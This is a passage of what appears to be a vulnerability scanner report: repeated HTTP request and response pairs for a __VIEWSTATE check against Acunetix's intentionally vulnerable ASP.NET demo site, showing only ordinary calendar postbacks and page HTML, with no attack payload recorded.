href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1173 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,173 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8152&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgBAXt%2FgJ9oIZGRkfqjS3cGq37Q15CHquxOJ%2FIt6j%2Bk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK%2BjZWNCAK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPheJzGEpEH%2BQ845HT9Ne%2F2xlC180%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:49:23 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgBAXt/gJ9oIZGRkfqjS3cGq37Q15CHquxOJ/It6j+k=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK+jZWNCAK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPheJzGEpEH+Q845HT9Ne/2xlC180=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:White" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1171 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,171 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8163&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgCA6bGFMNoIZGRkQr8LPA2%2FoskDiuzdO%2BTP1SobX5M%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL7hZakCgK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPNtBfPW%2F6ntlgXyROPbh%2FvWhMR%2FM%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:18:23 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgCA6bGFMNoIZGRkQr8LPA2/oskDiuzdO+TP1SobX5M=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL7hZakCgK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPNtBfPW/6ntlgXyROPbh/vWhMR/M=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:White" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" 